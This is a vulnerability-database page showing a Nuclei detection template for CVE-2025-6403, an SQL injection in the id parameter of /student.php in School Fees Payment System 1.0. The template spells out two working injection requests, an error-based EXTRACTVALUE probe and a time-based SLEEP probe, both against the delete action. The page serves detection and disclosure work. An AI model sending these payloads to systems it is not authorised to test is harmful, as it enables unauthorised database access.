Lucene search
K

Code-Projects School Fees Payment System 1.0 - SQL Injection

๐Ÿ—“๏ธย 01 Jul 2026ย 03:36:47Reported byย ProjectDiscoveryTypeย 
nuclei
ย nuclei
๐Ÿ”—ย github.com๐Ÿ‘ย 25ย Views

Critical SQL injection in School Fees Payment System 1.0 enables remote data breach; update to latest version.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-6403
21 Jun 202510:43
โ€“circl
CNNVD
Code-Projects School Fees Payment System ๆณจๅ…ฅๆผๆดž
21 Jun 202500:00
โ€“cnnvd
CNVD
School Fees Payment System student.php File SQL Injection Vulnerability
27 Jun 202500:00
โ€“cnvd
CVE
CVE-2025-6403
21 Jun 202510:00
โ€“cve
Cvelist
CVE-2025-6403 code-projects School Fees Payment System student.php sql injection
21 Jun 202510:00
โ€“cvelist
EUVD
EUVD-2025-18809
3 Oct 202520:07
โ€“euvd
NVD
CVE-2025-6403
21 Jun 202510:15
โ€“nvd
OSV
CVE-2025-6403
21 Jun 202510:15
โ€“osv
Positive Technologies
PT-2025-26499 ยท Code Projects ยท School Fees Payment System
21 Jun 202500:00
โ€“ptsecurity
RedhatCVE
CVE-2025-6403
23 Jun 202510:41
โ€“redhatcve
Rows per page
id: CVE-2025-6403

info:
  name: Code-Projects School Fees Payment System 1.0 - SQL Injection
  author: hnd3884
  severity: critical
  description: |
    A vulnerability was found in code-projects School Fees Payment System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /student.php. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
  impact: |
    Remote attackers can execute arbitrary SQL commands, potentially leading to data theft or modification.
  remediation: |
    Update to the latest version.
  reference:
    - https://www.cve.org/CVERecord?id=CVE-2025-6403
    - https://avd.aquasec.com/nvd/2025/cve-2025-6403/
    - https://github.com/tuooo/CVE/issues/16
    - https://vuldb.com/?id.313335
    - https://code-projects.org/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-6403
    cwe-id: CWE-74
    epss-score: 0.017
    epss-percentile: 0.74324
    cpe: cpe:2.3:a:code-projects:school_fees_payment_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2025,sqli,code_projects,unauth,school_fees_payment_system,time-based,vkev

flow: http(1) || http(2)

http:
  - raw:
      - |
        GET /student.php?action=delete&id=1'+AND+EXTRACTVALUE(0x0a,CONCAT(0x0a,VERSION()))--+- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "XPATH syntax error")'
        condition: and

  - raw:
      - |
        GET /student.php?action=delete&id=1'+AND+SLEEP(7)--+- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 7'
          - 'status_code == 302'
          - 'contains(body, "login.php")'
        condition: and
# digest: 4b0a0048304602210097706584a4b9509d02c398a8d40d17c758d5d4b92b71cd2b79ebe450f1c4164b022100c3a76d02e3e2e49de97058b176e8b4dc4c2c5eca389bb7d23e0b6f7adf864dc2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.17.3 - 9.8
CVSS 46.9
CVSS 27.5
CVSS 37.3
EPSS0.017
SSVC
25